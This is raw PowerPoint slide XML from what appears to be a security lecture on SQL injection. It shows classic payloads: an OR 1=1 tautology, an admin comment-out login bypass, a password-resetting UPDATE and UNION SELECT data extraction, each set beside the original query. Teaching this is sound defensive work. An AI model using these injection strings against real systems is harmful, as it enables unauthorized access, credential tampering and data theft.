                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'dude</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>';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Similarly to XSS, problem often arises when delimiters are unfiltered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73932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Injection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defTabSz="4572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lang="en-US" sz="2400" b="1" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Original query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="4572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lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Result after injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="4572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lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>--;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Vulnerabilities also arise from improper validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., failing to enforce that numbers are valid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69229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D1F2F-681A-4B80-8595-2E81AEEBC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 for SQL Injection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6F53F-EAD9-4D7E-91BE-EBE4D8BA4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Authentication bypass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35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> user, pw </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;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effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>--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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>' AND pw=' ';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Integrity violations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35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘12345'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>' '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> AND pw = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>' ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>’;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Confidentiality violation, e.g., database breach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35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> name, description </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> items </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'12'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="4572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lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
